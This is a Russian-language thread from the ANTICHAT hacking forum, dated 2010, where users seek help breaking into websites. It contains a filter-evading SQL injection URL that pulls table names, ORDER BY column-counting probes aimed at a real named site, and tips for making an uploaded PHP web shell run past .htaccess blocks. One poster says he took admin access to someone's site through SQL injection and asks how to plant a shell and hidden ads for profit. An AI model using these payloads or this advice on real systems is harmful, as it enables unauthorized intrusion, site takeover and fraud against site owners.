ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.11.2010, 23:31
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
Сообщение от None
Ты крут!, Пинч! Спасибо тебе и много радости. Блин вот только словеса типа information_schema.tables, да и user() блокнуты. Только версию вытащил.
http://site/news.php?id=1+/*!union*/+select+1,2,3,table_name+from+information_schema./*!tables*/--
ps если не проканало пиши в лс разберемся...
|
|
|
28.11.2010, 00:48
|
|
Новичок
Регистрация: 17.04.2010
Сообщений: 16
Провел на форуме:
84688
Репутация:
0
|
|
Здравствуйте , насчет аплоада шеллов , разрешена заливка php вместо картинки , все бы хорошо только при обращении вместо выполнения , браузер предлагает скачать файл. Насколько я понимаю , что то замечательное прописано в .htaccess в папке c изображениями , собстно сабж , что можно придумать.
|
|
|
|
28.11.2010, 02:18
|
|
Познающий
Регистрация: 30.07.2010
Сообщений: 33
Провел на форуме:
10390
Репутация:
0
|
|
В php нашел такой код:
Сообщение от None
if(isset($_GET["bid"])) {
$id_type = "bid";
$id = $_GET["bid"];
} else {
$id_type = "bhid";
$id = $_GET["bhid"];
}
Вид ссылки:
http://localhost/ban_details.php?bid=99999
Есть ли тут sql injection?
Или какого вида должен быть уязвимый код?) |
|
|
|
28.11.2010, 02:25
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от killrok6
В php нашел такой код:
Вид ссылки:
http://localhost/ban_details.php?bid=99999
Есть ли тут sql injection?
Или какого вида должен быть уязвимый код?)
Смотря что идет дальше, есть ли проверка типов или фильтр.
Можешь глянуть статью про этот движок /thread121710-amxbans.html
|
|
|
|
28.11.2010, 03:24
|
|
Познающий
Регистрация: 30.07.2010
Сообщений: 33
Провел на форуме:
10390
Репутация:
0
|
|
Наткнулся на ошибку:
Сообщение от None
Fatal error:
Error: 'alert()' is not an integer
textpattern/include/txp_article.php:360 assert_int()
textpattern/include/txp_article.php:54 article_edit()
textpattern/index.php:143 include()
in /home/vzritcom/public_html/textpattern/lib/txplib_misc.php on line 2348
Есть ли тут уязвимость? |
|
|
|
28.11.2010, 06:03
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Нет.
|
|
|
|
28.11.2010, 06:59
|
|
Новичок
Регистрация: 26.04.2010
Сообщений: 26
Провел на форуме:
136979
Репутация:
53
|
|
Сообщение от GIG
Здравствуйте , насчет аплоада шеллов , разрешена заливка php вместо картинки , все бы хорошо только при обращении вместо выполнения , браузер предлагает скачать файл. Насколько я понимаю , что то замечательное прописано в .htaccess в папке c изображениями , собстно сабж , что можно придумать.
Ты юзаешь ВСО?
Попробуй мад99, было такое раз помогло, хотя не точно хз что там у тебя...
Возможно там есть хтацесс запрещающий исполнение, попробуй залиться в другую папку, вариантов много =)
не справишься кидай линк, чем сможем тем поможем =)
|
|
|
|
28.11.2010, 16:09
|
|
Новичок
Регистрация: 20.04.2010
Сообщений: 1
Провел на форуме:
4855
Репутация:
0
|
|
сколько здесь колонок ))?
http://www.artistfacts.com/detail.php?id=2+order+by+1%20--
http://www.artistfacts.com/detail.php?id=2+order+by+1000%20--
http://www.artistfacts.com/detail.php?id=2+order+by+1000000%20--
|
|
|
|
28.11.2010, 16:18
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
Сообщение от None
сколько здесь колонок ))?
http://www.artistfacts.com/detail.php?id=2+order+by+1%20--
http://www.artistfacts.com/detail.php?id=2+order+by+1000%20--
http://www.artistfacts.com/detail.php?id=2+order+by+1000000%20--
с чего ты взял что там инъекция
|
|
|
|
29.11.2010, 16:52
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465
Репутация:
0
|
|
Такой вопрос, имеется сайт с хорошими показателями тиц и pr, доступ к админки вытащил из sql inj.
Возможно ли впихнуть рекламу( например sape), для заработка с него. Как сделать чтоб ее не запилили, может шел залить, как, какой? Спокойно выполняются js скрипты, можно с помощью них загнать шел на сервер, или еще как?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
